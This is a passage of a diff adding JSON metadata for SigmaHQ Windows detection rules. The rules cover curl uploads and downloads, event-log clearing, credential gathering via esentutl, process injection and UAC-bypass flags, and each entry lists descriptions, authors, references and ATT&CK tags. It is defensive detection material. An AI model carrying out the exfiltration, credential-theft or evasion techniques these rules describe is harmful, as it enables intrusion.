"2020/07/03", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_win_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "value": "Suspicious Curl File Upload" + }, + { + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "meta": { + "author": "Sreeman, Nasreddine Bencherchali", + "creation_date": "2020/01/13", + "falsepositive": [ + "Administrative scripts (installers)" + ], + "filename": "proc_creation_win_susp_curl_start_combo.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "value": "Curl Start Combination" + }, + { + "description": "Detects a suspicious curl process start on Windows with set useragent options", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_susp_curl_useragent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "value": "Suspicious Curl Change User Agents" + }, + { + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/28", + "falsepositive": [ + "Unknown yet" + ], + "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6345b048-8441-43a7-9bed-541133633d7a", + "value": "ZOHO Dctask64 Process Injection" + }, + { + "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "meta": { + "author": "frack113", + "creation_date": "2021/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_del.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "204b17ae-4007-471b-917b-b917b315c5db", + "value": "Suspicious Del in CommandLine" + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_desktopimgdownldr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "value": "Suspicious Desktopimgdownldr Command" + }, + { + "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_devinit_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460815932402679809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "90d50722-0483-4065-8e35-57efaadd354d", + "value": "DevInit Lolbin Download" + }, + { + "description": "The Devtoolslauncher.exe executes other binary", + "meta": { + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "creation_date": "2019/10/12", + "falsepositive": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_devtoolslauncher.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "value": "Devtoolslauncher.exe Executes Specified Binary" + }, + { + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dir.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "value": "Suspicious DIR Execution" + }, + { + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", + "value": "Direct Autorun Keys Modification" + }, + { + "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" + ], + "filename": "proc_creation_win_susp_disable_eventlog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://ss64.com/nt/logman.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" + ] + }, + "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "value": "Disable or Delete Windows Eventlog" + }, + { + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/06/19", + "falsepositive": [ + "Unknown, maybe some security software installer disables these features temporarily" + ], + "filename": "proc_creation_win_susp_disable_ie_features.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "value": "Disabled IE Security Features" + }, + { + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/21", + "falsepositive": [ + "Legitimate deinstallation by administrative staff" + ], + "filename": "proc_creation_win_susp_disable_raccine.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/Raccine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "value": "Raccine Uninstall" + }, + { + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "meta": { + "author": "Ivan Dyachkov, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + ], + "filename": "proc_creation_win_susp_diskshadow.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "value": "Execution via Diskshadow.exe" + }, + { + "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", + "meta": { + "author": "Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/07/04", + "falsepositive": [ + "Legitimate admin usage" + ], + "filename": "proc_creation_win_susp_ditsnap.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/yosqueoy/ditsnap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", + "value": "DIT Snapshot Viewer Use" + }, + { + "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_dllhost_no_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "value": "Dllhost Process With No CommandLine" + }, + { + "description": "Execute C# code located in the consoleapp folder", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of dnx.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_dnx.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ] + }, + "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "value": "Application Whitelisting Bypass via Dnx.exe" + }, + { + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "meta": { + "author": "Florian Roth (rule), @blu3_team (idea)", + "creation_date": "2019/06/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_double_extension.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "value": "Suspicious Double Extension" + }, + { + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/12/27", + "falsepositive": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "filename": "proc_creation_win_susp_download_office_domain.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" + ], + "tags": "No established tags" + }, + "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "value": "Suspicious Download from Office Domain" + }, + { + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" + ], + "tags": "No established tags" + }, + "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "value": "Suspicious Kernel Dump Using Dtrace" + }, + { + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_electron_app_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://taggart-tech.com/quasar-electron/", + "https://github.com/mttaggart/quasar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "value": "Suspicious Electron Application Child Processes" + }, + { + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "meta": { + "author": "FPT.EagleEye", + "creation_date": "2020/12/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "value": "Emotet RunDLL32 Process Creation" + }, + { + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "meta": { + "author": "sam0x90", + "creation_date": "2021/08/06", + "falsepositive": [ + "To be determined" + ], + "filename": "proc_creation_win_susp_esentutl_params.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://attack.mitre.org/software/S0404/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" + ] + }, + "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "value": "Esentutl Gather Credentials" + }, + { + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "meta": { + "author": "Ecco, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_eventlog_clear.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil" + }, + { + "description": "Detects a suspicious execution from an uncommon folder", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_execution_path.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "value": "Execution from Suspicious Folder" + }, + { + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Various applications", + "Tools that include ping or nslookup command invocations" + ], + "filename": "proc_creation_win_susp_execution_path_webserver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", + "value": "Execution in Webserver Root Folder" + }, + { + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate explorer.exe run from cmd.exe" + ], + "filename": "proc_creation_win_susp_explorer.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", + "value": "Proxy Execution Via Explorer.exe" + }, + { + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", + "creation_date": "2019/06/29", + "falsepositive": [ + "Unknown how many legitimate software products use that method" + ], + "filename": "proc_creation_win_susp_explorer_break_proctree.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "value": "Explorer Process Tree Break" + }, + { + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" + ], + "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ORCA6665/status/1496478087244095491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "value": "Explorer NOUACCHECK Flag" + }, + { + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "meta": { + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2018/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_file_characteristics.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.006" + ] + }, + "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "value": "Suspicious File Characteristics Due to Missing Fields" + }, + { + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", + "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" + }, + { + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", + "meta": { + "author": "frack113", + "creation_date": "2021/12/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_385201.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", + "value": "Suspicious Findstr 385201 Execution" + }, + { + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "meta": { + "author": "Trent Liffick", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_findstr_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" + ] + }, + "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "value": "Findstr Launching .lnk File" + }, + { + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2021/02/24", + "falsepositive": [ + "Admin activity (unclear what they do nowadays with finger.exe)" + ], + "filename": "proc_creation_win_susp_finger_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", + "value": "Finger.exe Suspicious Invocation" + }, + { + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_format.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "value": "Format.com FileSystem LOLBIN" + }, + { + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "meta": { + "author": "Ecco, E.M. Anhaus, oscd.community", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_fsutil_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "add64136-62e5-48ea-807e-88638d02df1e", + "value": "Fsutil Suspicious Invocation" + }, + { + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "meta": { + "author": "frack113", + "creation_date": "2022/05/01", + "falsepositive": [ + 